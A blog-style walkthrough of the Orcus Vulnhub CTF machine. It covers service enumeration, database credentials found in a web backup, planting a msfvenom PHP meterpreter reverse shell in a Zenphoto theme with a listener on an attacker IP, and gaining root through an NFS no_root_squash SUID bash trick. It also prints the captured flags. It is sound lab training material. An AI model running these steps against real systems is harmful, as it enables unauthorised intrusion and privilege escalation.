Vulnhub Walkthrough: Orcus

Setup

Go to the Orcus entry on Vulnhub, read the description, download the .ova file and load it into VirtualBox. The description of the machine is:

Welcome to Orcus
This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/

Difficulty : Hard

Tips:

If youre stuck enumerate more! Seriously take each service running on the system and enumerate them more!

Goals: This machine is intended to take a lot of enumeration and understanding of Linux system.

There are 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box 4. There is something on this box that is different from the others from this series (Quaoar and Sedna) find why its different.

Feedback: This is my third vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter simon.nolet@hotmail.com

Special Thanks to madmantm for testing this machine

SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E

The image that boots up looks like this:

Orcus VM

There are four tasks to complete/flags to capture:

  1. Get a shell
  2. Get root access
  3. There is a post exploitation flag on the box
  4. There is something on this box that is different from the other from this series (Quaoar and Sedna) find why it's different

I haven't seen Quaoar or Senda yet, so I will only attempt tasks 1-3 for the time being.

Information Gathering

As usual, we should start by finding out what is running on the machine to see the possible attack vectors.

Service Enumeration

To see what services are running, we use nmap:

nmap -p- -A 192.168.1.109
Host is up (0.00095s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp    open  domain      ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php 
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php 
| /exponent_version.php /getswversion.php /login.php /overrides.php 
| /popup.php /selector.php /site_rss.php /source_selector.php 
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL PIPELINING AUTH-RESP-CODE CAPA TOP UIDL RESP-CODES STLS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: ENABLE more SASL-IR have IDLE capabilities ID listed IMAP4rev1 post-login LITERAL+ OK Pre-login LOGINDISABLEDA0001 STARTTLS LOGIN-REFERRALS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
443/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_  256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: ENABLE SASL-IR AUTH=PLAINA0001 IDLE capabilities ID more IMAP4rev1 post-login LITERAL+ OK have listed Pre-login LOGIN-REFERRALS
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) PIPELINING USER CAPA TOP UIDL RESP-CODES AUTH-RESP-CODE
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after:  2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
37781/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
41212/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
41909/tcp open  mountd      1-3 (RPC #100005)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41212/tcp  mountd
|   100005  1,2,3      50358/udp  mountd
|   100021  1,3,4      45914/tcp  nlockmgr
|   100021  1,3,4      50287/udp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
45914/tcp open  nlockmgr    1-4 (RPC #100021)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: 
|   NetBIOS computer name: ORCUS
|   Workgroup: WORKGROUP
|_  System time: 2018-08-28T07:32:12-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.25 seconds

There is a lot of information here but for now the interesting takeaways from are:

  1. The machine is running Linux Ubuntu
  2. There is a website running on the normal port 80 for http traffic
  3. There are ssh services running on port 22 (the normal port) and also port 443 (usually for https web traffic). One of these ssh services may be fake or configured significantly differently.
  4. There is an email service running on the normal ports 143 and 993
  5. There are various nfs shares exposed

I come from a web developer background so I like to start by snooping around on the website.

Website Enumeration

The easiest way to start is just to use a browser and see what we can see:

Orcus website homepage

Clicking on the image yields the following:

Orcus website click-through page

From here, there is not much more we can do with the browser.

So we should check what else is on the webserver with other tools?

curl 192.168.1.109/robots.txt
User-agent: *
Crawl-delay: 5
Disallow: /exponent.js.php
Disallow: /exponent.js2.php
Disallow: /exponent.php
Disallow: /exponent_bootstrap.php
Disallow: /exponent_constants.php
Disallow: /exponent_php_setup.php
Disallow: /exponent_version.php
Disallow: /getswversion.php
Disallow: /login.php
Disallow: /overrides.php
Disallow: /popup.php
Disallow: /selector.php
Disallow: /site_rss.php
Disallow: /source_selector.php
Disallow: /thumb.php
Disallow: /ABOUT.md
Disallow: /CHANGELOG.md
Disallow: /CREDITS.md
Disallow: /INSTALLATION.md
Disallow: /LICENSE
Disallow: /README.md
Disallow: /RELEASE.md
Disallow: /TODO.md
Disallow: /cgi-bin/
Disallow: /cart/
Disallow: /login/
Disallow: /users/
Disallow: /files/
Disallow: /tmp/
Disallow: /search/
# Sitemap: http://www.mysite.com/sitemap.xml

It turns out there is quite a lot on the webserver and the robots.txt file gives a lot of it away. By looking around the files and directories above in a browser, we can find the CMS in use is ExponentCMS v2.3.9. However, the login.php page shows the database is currently offline.

Sometimes this means there is a misconfiguration that be exploited and sometimes it means there is simply nothing setup yet. In this case, we can carry on with a breadth-first search to see if we can find any other low-hanging fruits hidden on the website.

dirb http://192.168.1.109
==> DIRECTORY: http://192.168.1.109/admin/ 
==> DIRECTORY: http://192.168.1.109/backups/ 
==> DIRECTORY: http://192.168.1.109/cron/ 
==> DIRECTORY: http://192.168.1.109/external/ 
==> DIRECTORY: http://192.168.1.109/FCKeditor/ 
==> DIRECTORY: http://192.168.1.109/files/ 
==> DIRECTORY: http://192.168.1.109/framework/ 
==> DIRECTORY: http://192.168.1.109/install/ 
==> DIRECTORY: http://192.168.1.109/javascript/ 
==> DIRECTORY: http://192.168.1.109/phpmyadmin/ 
==> DIRECTORY: http://192.168.1.109/themes/ 
==> DIRECTORY: http://192.168.1.109/tmp/ 
+ http://192.168.1.109/index.html (CODE:200|SIZE:101) 
+ http://192.168.1.109/webalizer (CODE:200|SIZE:0) 
+ http://192.168.1.109/xmlrpc.php (CODE:200|SIZE:0) 
+ http://192.168.1.109/index.php (CODE:200|SIZE:4564) 
+ http://192.168.1.109/server-status (CODE:403|SIZE:301) 
... 

By going to the /admin directory in a browser, we are greeted with an empty, white page but if you look a little deeper there is an HTML comment in the source code:

<!-- This is a backup taken from the backups/-->

So we should definitely follow the trail to backups directory - it's often a dumping ground for all sorts of weird and wonderful files and folders - especially secrets.

Sure enough, there is a file name "SimplePHPQuiz-Backupz.tar.gz" that can be downloaded and, once extracted, we can see database credentials in the "includes/db_conn.php" file.

DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

We should take a note of these credentials - they will be useful in a moment.

Accessing the Database

Looking back through the dirb output, we can see a /phpmyadmin directory present on the webserver. It makes most sense to try out the database credentials we have found in the phpmyadmin application to  try to access any MySQL databases..

Fortunately, by going to http://192.168.1.109/phpmyadmin and entering the credentials, we can login with a user that have all privileges:

SHOW GRANTS; 
GRANT ALL PRIVILEGES ON *.* TO 'dbuser'@'localhost';

For interest sake, we can look around to see what else is in the database. Although there are no other interesting users, there are a number of interesting databases.

Note: We can see a trail left behind from the vm creator "Viper" with his host "viperhard" in the mysql users table.

Back to the databases, we have:

  • Adem - This is an empty database and it's not clear what it is used for
  • mysql - This is an internal mysql table
  • information_schema - This is an internal mysql table
  • PHPFusion - This could support a lightweight CMS (the database is empty)
  • phpmyadmin - We are using this system right now
  • quizdb - This is an empty database
  • SimplePHPQuiz - This is an empty database
  • sys - This is an internal mysql table
  • zencart - This could support an ecommerce website
  • zenphoto - This could support a media CMS (the database is empty)

Note: various mysql exploits will not work, not least because secure_file_priv is activated

Further Web Enumerations

Given the above database names and the premise that databases often support websites of a similar name, we can try to access each of the following URLs in a browser to see if anything is running:

Only zenphoto yields a result and luckily for us it has not yet been configured. This means we can set it up ourselves and have access to the application and whatever it can do.

Zenphoto Exploits

Looking around the different pages on the website, we can read the following on the themes tab:

You can edit files from custom themes. Official themes shipped with Zenphoto are not editable, since your changes would be lost on next update. If you want to customize an official theme, please first duplicate it. This will place a copy in your /themes folder for you to edit.

So the answer is right in front of us - duplicate and edit a theme with reverse shell code. We can edit the theme index.php page for ease but this is quite overt - it would be better to edit a different file or add a new file to be covert instead.

To generate the php reverse shell, we can use msfvenom:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=4444

Before going to web page, be sure to start a handler with metasploit:

msfconsole
msf > use multi/handler 
msf exploit(handler)> set payload php/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.110
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> run

Now reloading the website at http://192.168.1.109/zenphoto/ yields us a meterpreter shell.

Unprivileged Actions

First things first, in the meterpreter shell we can capture another flag:

meterpreter > cd /var/www 
meterpreter > cat flag.txt 
868c889965b7ada547fae81f922e45c4 

We can then get a nicer shell with a bit of python:

meterpreter > shell 
Process 3097 created. 
Channel 0 created.  

python -c 'import pty; pty.spawn("/bin/bash")' 

www-data@Orcus:/var/www$

Privilege Escalation

Escalating our privileges to root often involves some sort of kernal or os vulnerability. In this case though, we have another - fairly straightforward - way in.

We should remember the nfs services at the beginning our information gathering stage and check the configuration. In the best case scenario, we can upload, edit and execute files.

The configuration is available at /etc/exports:

www-data@Orcus:/tmp$ cat /etc/exports 
cat /etc/exports 
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5). 
# 
# Example for NFSv2 and NFSv3: 
# /srv/homes     
hostname1(rw,sync,no_subtree_check)     
hostname2(ro,sync,no_subtree_check) 
# 
# Example for NFSv4: 
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) 
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) 
/tmp *(rw,no_root_squash)

Having the configuration "no_root_squash" means we can upload a file as root from a local machine and it will stay owned as root instead of being downgraded to be owned by nobody. This provides our means of privilege escalation:

Note: This also requires installing the nfs-common package if it is not present on your systemf

Now there are a few ways to get root. In this case, we can simply copy over the /bin/bash file, change its permissions, execute the file and become root.

Copy /bin/bash to the nfs mount from the remote machine:

www-data@Orcus:/tmp$ cp /bin/bash /tmp/makemyday

Change the file permissions from the local machine:

root@kali:/mnt$ chown root: makemyday root@kali:/mnt$ chmod u+s makemyday

Execute the file:

www-data@Orcus:/tmp$ ./makemyday -p
./makemyday -p

makemyday-4.3# id 
id 
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) 

There's a flag in /root:

makemyday-4.3# cd /root 
cd /root 

makemyday-4.3# cat flag.txt 
cat flag.txt 
807307b49314f822985d0410de7d8bfe

Bonus Content

You may have noticed the ssh-creds.bak file in the /backups directory towards the start that we couldn't download. We can now see the contents of this file in the shell:

mmdrd-4.3# cat ssh-creds.bak
cat ssh-creds.bak
root:123456

A simple Google search of this username/password combination leads us to pages about Kippo Honeypots - remember the two ssh services running at the start too?

A little bit more digging around Kippo leads us to another flag:

mmdrd-4.3# cat /etc/kippo/data/userdb.txt
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

TH!SP4SSW0RDIS4Fl4G = This password is a flag.

Show Comments

Get the latest posts delivered right to your inbox.